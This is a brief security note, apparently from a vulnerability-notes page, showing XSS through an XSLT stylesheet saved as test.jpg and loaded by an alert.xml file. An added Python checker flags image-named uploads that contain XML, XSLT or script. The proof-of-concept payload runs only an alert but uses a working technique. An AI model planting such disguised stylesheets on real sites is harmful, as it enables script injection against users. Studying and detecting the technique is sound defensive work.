Exploitation conditions:
1. The same-origin policy is satisfied

test.jpg:
<?xml version="1.0" encoding="iso-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html><body>
<script>alert(/hacked by xsser/);</script>
</body></html>
</xsl:template>
</xsl:stylesheet>

alert.xml:
<?xml version="1.0" encoding="iso-8859-1"?>
<?xml-stylesheet type="text/xsl" href="test.jpg"?>
<test></test>
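
A defensive check for the case shown above, where a file named test.jpg actually holds an XSLT stylesheet. This is an added example, not code from the original page or the referenced article; the function name `classify_upload`, the finding strings and the `REAL_JPEG` sample are assumptions made for illustration.

```python
import re

# Magic bytes that real raster images start with.
IMAGE_MAGIC = {"jpeg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
IMAGE_EXTS = {"jpg", "jpeg", "png", "gif"}
# Namespace URI that identifies an XSLT stylesheet (present in test.jpg above).
XSLT_NS = b"http://www.w3.org/1999/XSL/Transform"
SCRIPT_TAG = re.compile(rb"<\s*script\b", re.IGNORECASE)

# test.jpg exactly as shown on this page.
XSL_AS_JPG = b"""<?xml version="1.0" encoding="iso-8859-1"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html><body>
<script>alert(/hacked by xsser/);</script>
</body></html>
</xsl:template>
</xsl:stylesheet>
"""
# Constructed sample: the first bytes of a genuine JPEG (JFIF header), padded.
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01\x01" + b"\x00" * 32


def classify_upload(filename: str, data: bytes) -> dict:
    """Compare a file's claimed image extension with what its bytes contain."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    claims_image = ext in IMAGE_EXTS
    detected = next((n for n, m in IMAGE_MAGIC.items() if data.startswith(m)), None)
    # Skip a UTF-8 BOM and leading whitespace before looking for an XML prolog.
    head = data.lstrip(b"\xef\xbb\xbf \t\r\n")[:64]
    findings = []
    if claims_image and detected is None:
        findings.append("image extension without image magic bytes")
    if head.startswith((b"<?xml", b"<xsl:")):
        findings.append("content begins as XML")
    if XSLT_NS in data:
        findings.append("XSLT namespace present")
    if SCRIPT_TAG.search(data):
        findings.append("script element present")
    return {"detected": detected, "findings": findings,
            "reject": claims_image and bool(findings)}


if __name__ == "__main__":
    for name, blob in (("test.jpg", XSL_AS_JPG), ("photo.jpg", REAL_JPEG)):
        print(name, classify_upload(name, blob))
```
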

Reference article: https://www.secpulse.com/archives/11520.html